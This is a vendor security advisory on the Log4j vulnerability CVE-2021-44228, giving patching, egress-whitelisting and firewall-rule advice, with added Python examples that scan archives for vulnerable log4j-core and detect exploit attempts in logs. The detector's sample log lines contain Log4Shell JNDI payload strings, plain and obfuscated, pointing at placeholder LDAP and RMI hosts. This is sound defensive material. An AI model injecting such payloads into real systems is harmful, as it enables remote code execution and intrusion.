Critical Vulnerability in Apache Log4j

A critical vulnerability has been discovered in Apache Log4j (CVE-2021-44228), rated with the maximum CVSS score of 10.0. The vulnerability is considered easy to exploit, and unfortunately Apache Log4j is very widely used.

Apache Log4j is an open-source Java-based logging framework used in many Java applications, so products and systems both in the cloud and on-premises are affected.

The vulnerability is exploited by getting a system that uses Apache Log4j to log a specially crafted string, for example one placed in an HTTP header or form field. When Log4j processes the string it performs a JNDI lookup, which instructs the system to download and subsequently execute attacker-supplied malicious software.

The vulnerability was identified on December 9, 2021, so it is very new, which means that many systems are still unpatched or have no patch available yet. Many manufacturers are still examining whether their products are vulnerable or not.

Conscia will update our customers through CNS and on social media as soon as we have new information.

What do I do now?

Keep an eye out for advisories from the manufacturers and Conscia.

Manufacturers are working hard to test their products and, if they prove to be vulnerable, to create and distribute a patch against Log4j. Conscia follows the situation and updates you through CNS and social media.

Update your Apache Log4j

If you maintain a system that uses Apache Log4j, you should update it to the latest version of Log4j. Remember that Log4j is often bundled inside an application's own archive (a WAR or EAR file, or a fat JAR), so check the copies shipped with your applications and not only the one installed on the server.
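As an added example, not part of the original advisory, the following Python script finds log4j-core inside JAR, WAR and EAR files, including archives nested inside other archives, and reports whether each copy still needs the update. It reads the version from the jar's Maven pom.properties and checks for the JndiLookup class; a copy is reported as vulnerable when that class is present and the version is below the fixed version, which is assumed here to be 2.15.0, the first release that fixed CVE-2021-44228 (adjust the constant to whatever version the current Apache advisory requires). A jar from which JndiLookup.class has been removed is treated as mitigated. The sample archives it scans are constructed inline in a temporary directory and are not real Log4j jars.

```python
import io
import os
import tempfile
import zipfile
from pathlib import Path

# Paths inside a log4j-core jar. The lookup class is what CVE-2021-44228 abuses;
# pom.properties carries the artifact version.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Assumption: 2.15.0 is used here as the first release that fixed CVE-2021-44228;
# set this to the version the current Apache advisory requires.
FIXED_VERSION = (2, 15, 0)
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """Turn '2.14.1' or '2.15.0-rc1' into a comparable (major, minor, patch) tuple."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits) if digits else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def scan_archive(zf, location, findings):
    """Record log4j-core evidence in one open zip and recurse into nested archives."""
    names = set(zf.namelist())
    version = None
    if POM_PROPERTIES in names:
        for line in zf.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version is not None or has_jndi:
        # Vulnerable if the lookup class is present and the version is unknown or
        # older than the fix. A jar with JndiLookup.class removed is treated as
        # mitigated for CVE-2021-44228 even when its version is old.
        vulnerable = has_jndi and (version is None or parse_version(version) < FIXED_VERSION)
        findings.append({"location": location, "version": version,
                         "jndi_lookup": has_jndi, "vulnerable": vulnerable})
    for name in sorted(names):  # fat jars, WARs and EARs carry jars inside them
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                scan_archive(inner, f"{location}!/{name}", findings)


def scan_path(root):
    """Scan a file or a directory tree for archives that contain log4j-core."""
    root = Path(root)
    findings = []
    candidates = [root] if root.is_file() else root.rglob("*")
    for path in candidates:
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    scan_archive(zf, str(path), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_jar(target, version, include_jndi_lookup):
    """Write a constructed stand-in for log4j-core (sample data, not the real jar)."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPERTIES, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes


def demo():
    """Build constructed samples in a temp dir, scan them, return {relative location: vulnerable}."""
    tmp = Path(tempfile.mkdtemp())
    build_sample_jar(tmp / "log4j-core-2.14.1.jar", "2.14.1", True)
    build_sample_jar(tmp / "log4j-core-2.15.0.jar", "2.15.0", True)
    build_sample_jar(tmp / "log4j-core-2.14.1-stripped.jar", "2.14.1", False)
    nested = io.BytesIO()  # a WAR with log4j-core bundled inside WEB-INF/lib
    build_sample_jar(nested, "2.14.1", True)
    with zipfile.ZipFile(tmp / "app.war", "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", nested.getvalue())
    prefix = str(tmp) + os.sep
    return {f["location"].replace(prefix, "", 1): f["vulnerable"] for f in scan_path(tmp)}


if __name__ == "__main__":
    for location, vulnerable in sorted(demo().items()):
        print(("VULNERABLE " if vulnerable else "ok         ") + location)
```

Point scan_path at an application directory (for example the directory holding your deployed WAR files) to get one finding per copy of log4j-core, with the nested location spelled out as outer.war!/WEB-INF/lib/inner.jar. Shaded or renamed copies without a pom.properties are still caught by the class check and reported as vulnerable because their version cannot be confirmed.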

Create a white-list of Internet traffic from your servers.

If your servers cannot reach the attacker's infrastructure on the Internet, the exploit cannot download and run its malicious software. Therefore, create rules in your NGFW, proxy or Umbrella that white-list traffic from your servers only towards legitimate update servers (Windows Update etc.) and, if these are not hosted locally, DNS, NTP etc. All other outbound traffic should be blocked. Note that this limits the damage but does not remove the vulnerability: the first step of the exploit is an outbound connection from the server (typically LDAP, RMI or DNS), so keep the white-list tight and still update Log4j as soon as you can.

Logging

Keep an eye on the logs from your firewall, your network and your servers in the coming period. The vulnerability is being actively exploited, and not all attack surfaces are known yet. Conscia can also help monitor your logs. Contact your account manager for more information.
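As an added example, not from the original advisory: a small Python detector that runs over constructed sample web-server access-log lines (not real traffic) and flags requests carrying a Log4j lookup string. Exploit attempts are rarely a literal ${jndi:ldap://...}; attackers URL-encode the string and hide the word jndi behind nested lookups such as ${lower:j} or ${::-j}, so the detector decodes and resolves those before matching, and reports the protocol and callback host so the host can be blocked on the firewall. The sample lines, addresses and obfuscations are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): a benign request, three
# requests carrying Log4j lookup strings in different disguises, and a benign
# request that merely mentions "jndi" in a path.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.9%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "${${env:NOPE:-j}ndi:${::-r}mi://192.0.2.44:1099/obj}" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...} only, no nesting inside
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^/}\s]*)", re.IGNORECASE)


def _resolve_lookup(match):
    """Evaluate the lookups attackers use to obfuscate 'jndi'; leave all others intact."""
    body = match.group(1)
    if ":-" in body:                      # ${prefix:key:-default} resolves to default
        return body.split(":-", 1)[1]
    if body[:6].lower() == "lower:":
        return body[6:].lower()
    if body[:6].lower() == "upper:":
        return body[6:].upper()
    return match.group(0)                 # e.g. ${jndi:...} stays as it is


def normalize(text, max_rounds=10):
    """Undo URL encoding and nested lookups so a disguised ${jndi:...} becomes literal."""
    for _ in range(3):                    # also handles double encoding
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):           # resolve from the innermost lookup outwards
        resolved = LOOKUP_RE.sub(_resolve_lookup, text)
        if resolved == text:
            break
        text = resolved
    return text


def analyze(lines):
    """Return one finding per line that contains a JNDI lookup after normalization."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        match = JNDI_RE.search(norm)
        if match:
            findings.append({"line_no": number, "scheme": match.group(1).lower(),
                             "target": match.group(2), "normalized": norm})
    return findings


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: {hit['scheme']} callback to {hit['target']}")
```

The resolver deliberately evaluates only the default-value, lower and upper lookups, which is enough to unmask the common disguises; anything else is left in place so that the final ${jndi:...} survives for the match. Run it against the User-Agent, Referer, query-string and any other request field your web servers log, since all of them are candidate inputs to Log4j.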

For Cisco customers:

  • For customers with Cisco Firepower NGFW, Cisco has released Snort 2 and Snort 3 rules to detect and block the attack. You should verify that the rules are downloaded and deployed on your Firepower device.

    ‘Talos is releasing Snort 2 SIDs 58722-58733 and Snort 3 SIDs: 300055-300057 to address CVE-2021-44228, an RCE vulnerability in the Apache Log4j API.’

    Source: https://www.snort.org/advisories/talos-rules-2021-12-10

  • SSL decryption is required to detect all attempts to exploit this vulnerability. If SSL decryption is not possible, you should create a white-list of FQDNs / URLs that your servers may reach on the Internet so that your systems cannot download the malicious software, or you should implement Secure Endpoint / Umbrella.
  • Cisco Secure Endpoint (AMP for Endpoint) can block attempts to exploit this vulnerability.
  • Cisco Umbrella can block access to malicious domains, IPs, and URLs.

Cisco has many products, so they are still investigating which of them are potentially vulnerable. Cisco keeps the following advisory about its products updated.

Source: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd#vp

For Palo Alto customers:

  • Customers with Next-Generation Firewalls and an active Threat Prevention security subscription can detect and block sessions with the following Threat IDs:

    91991 (initially released in Applications and Threats content update version 8498 and further enhanced in version 8499). Additionally, attacker infrastructure is continuously being monitored and blocked.

    91994 and 91995 (released in Applications and Threats content version 8500).

  • SSL decryption is required to detect all attempts to exploit this vulnerability. If this is not possible, you should create a white-list of FQDNs / URLs that your servers may reach on the Internet so that your systems cannot download the malicious software, or you should implement Cortex XDR.
  • Cortex XDR protects through Behavioral Threat Protection (BTP), except Cortex XDR on Linux, which is protected by content package 290-78377.
  • Cortex XSOAR customers can use the “CVE-2021-44228 – Log4j RCE” content pack to detect and mitigate the vulnerability automatically.
  • Prisma Cloud Compute Defender agents can detect continuous integration (CI) projects, container images or host systems that contain a vulnerable Log4j package.

Source: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

More about Log4j in local languages
You can read more about the Log4j vulnerability in Danish, Dutch, Norwegian or Swedish on our local websites.
